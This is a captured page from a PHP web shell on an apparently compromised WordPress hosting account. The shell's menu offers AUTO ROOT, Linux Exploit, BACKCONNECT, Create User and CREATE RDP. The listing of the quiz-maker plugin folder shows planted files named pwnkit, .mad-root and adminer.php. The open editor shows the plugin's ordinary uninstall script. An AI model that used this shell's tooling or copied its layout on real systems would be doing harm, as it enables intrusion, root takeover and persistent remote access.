Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
quiz-maker /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
pb_templates
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
quiz
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE.txt
17.67
KB
-rw-r--r--
README.txt
59.29
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
ays_quiz_shortcode.js
842
B
-rw-r--r--
index.php
26
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
quiz-maker.php
22.09
KB
-rw-r--r--
uninstall.php
2.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uninstall.php
<?php /** * Fired when the plugin is uninstalled. * * When populating this file, consider the following flow * of control: * * - This method should be static * - Check if the $_REQUEST content actually is the plugin name * - Run an admin referrer check to make sure it goes through authentication * - Verify the output of $_GET makes sense * - Repeat with other user roles. Best directly by using the links/query string parameters. * - Repeat things for multisite. Once for a single site in the network, once sitewide. * * This file may be updated more in future version of the Boilerplate; however, this is the * general skeleton and outline for how the file should work. * * For more information, see the following discussion: * https://github.com/tommcfarlin/WordPress-Plugin-Boilerplate/pull/123#issuecomment-28541913 * * @link http://ays-pro.com/ * @since 1.0.0 * * @package Quiz_Maker */ // If uninstall not called from WordPress, then exit. if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { exit; } if(get_option('ays_quiz_maker_upgrade_plugin','false') === 'false'){ global $wpdb; $quiz_categories_table = $wpdb->prefix . 'aysquiz_quizcategories'; $quizes_table = $wpdb->prefix . 'aysquiz_quizes'; $questions_table = $wpdb->prefix . 'aysquiz_questions'; $question_categories_table = $wpdb->prefix . 'aysquiz_categories'; $answers_table = $wpdb->prefix . 'aysquiz_answers'; $reports_table = $wpdb->prefix . 'aysquiz_reports'; $rates_table = $wpdb->prefix . 'aysquiz_rates'; $themes_table = $wpdb->prefix . 'aysquiz_themes'; $settings_table = $wpdb->prefix . 'aysquiz_settings'; $wpdb->query("DROP TABLE IF EXISTS `".$answers_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$questions_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$quizes_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$reports_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$rates_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$themes_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$quiz_categories_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$question_categories_table."`"); $wpdb->query("DROP TABLE IF EXISTS `".$settings_table."`"); delete_option( "ays_quiz_db_version"); delete_option( "ays_quiz_maker_upgrade_plugin"); delete_option( "ays_quiz_disable_live_chat_icon"); delete_option('ays_quiz_first_time_activation_page'); delete_option('ays_quiz_agree_terms'); delete_option('ays_quiz_show_agree_terms'); } $api_url = "https://poll-plugin.com/quiz-maker/uninstall/"; wp_remote_post( $api_url, array( 'timeout' => 30, 'body' => wp_json_encode(array( 'type' => 'quiz-maker', )), ) );
Close